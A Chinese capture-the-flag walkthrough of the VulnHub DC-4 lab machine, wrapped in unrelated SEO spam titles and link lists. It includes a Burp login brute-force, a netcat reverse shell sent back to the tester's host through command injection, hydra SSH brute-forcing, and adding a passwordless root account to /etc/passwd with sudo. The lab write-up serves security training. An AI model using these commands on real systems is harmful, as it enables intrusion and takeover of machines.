当前位置: 首页 > news >正文

wordpress文章分页共多少页广告优化师培训

wordpress文章分页共多少页,广告优化师培训,b站有没有推广,晋江论坛网项目地址 https://download.vulnhub.com/dc/DC-4.zip实验过程 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址 nmap 192.168.47.1-254根据对比可知DC-4的一个ip地址为192.1…

项目地址

https://download.vulnhub.com/dc/DC-4.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

nmap -A -p- 192.168.47.145

发现开放22和80端口

访问http://192.168.47.145

发现是个登录界面

尝试使用BP抓包进行爆破

发送到Intruder模块

载入密码字典,开始攻击

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录

登录成功

漏洞利用

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包

发现radio可以修改

设置监听
nc -lvvp 8888

反弹shell

注意原数据包空格用+代替的,所以我们也用+来代替

nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功

获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

提权

四处翻翻

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中

使用hydra命令进行爆破
hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145

爆破出来密码是jibril04

使用ssh连接

连接成功

尝试查看刚才没权限的那个文件
cat /home/jim/mbox

看上去像是收到一封邮件

去var/mail找找
cat /var/mail/jim

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户

登录成功

查看权限

发现charles有teehee命令的权限

使用teehee创建一个root用户
echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

添加成功

切换账户

发现flag.txt在/root目录下

查看flag

http://www.dinnco.com/news/83717.html

相关文章:

  • 教人如何做吃的网站品牌宣传策略
  • 上海做网站的公司哪家好湖州网站seo
  • 长沙专业做网站公司湖南网站建站系统哪家好
  • 深圳有哪些知名企业360优化大师安卓版下载
  • 免费模板素材网站ppt网站软文代写
  • 用新华做网站名是否侵权湖南百度推广公司
  • 网站建设 硬件网页生成app
  • 做二手平台公益的网站上海seo有哪些公司
  • 网络推广的基本手段seo标题关键词优化
  • 中国10强企业排名seo网络营销课程
  • 做一张网站专栏背景图seo sem是什么
  • 外贸开发软件有哪些seo高级教程
  • 网站开发文档步骤应该怎么写国外网站推广平台有哪些?
  • 免费个人业务网站制作电商运营一天都干啥
  • wordpress文本增强页面优化建站seo门户
  • 不备案的网站福建seo排名
  • 推广公司有哪些西安网站seo优化公司
  • 网站开发外文翻译广告优化师前景怎样
  • 织梦可以做导航网站seo优化工程师
  • 山东淄博网站建设的公司最新的网络营销的案例
  • 那个网站教做仙芋鲜深圳互联网营销
  • 网站如何做关键字收录安康seo
  • 线上营销工具百度首页排名优化平台
  • 泰安可以做网站的公司seo引擎
  • wordpress怎么给图片添加超链接郑州搜索引擎优化
  • ps做图游戏下载网站seo技术是什么
  • 百度网盟推广怎么选择投放网站沈阳cms模板建站
  • 泰安网站建设制作电话号码大数据培训课程
  • 越秀区pc端网站建设上海网站推广广告
  • 张店网站制作设计公司广告推送平台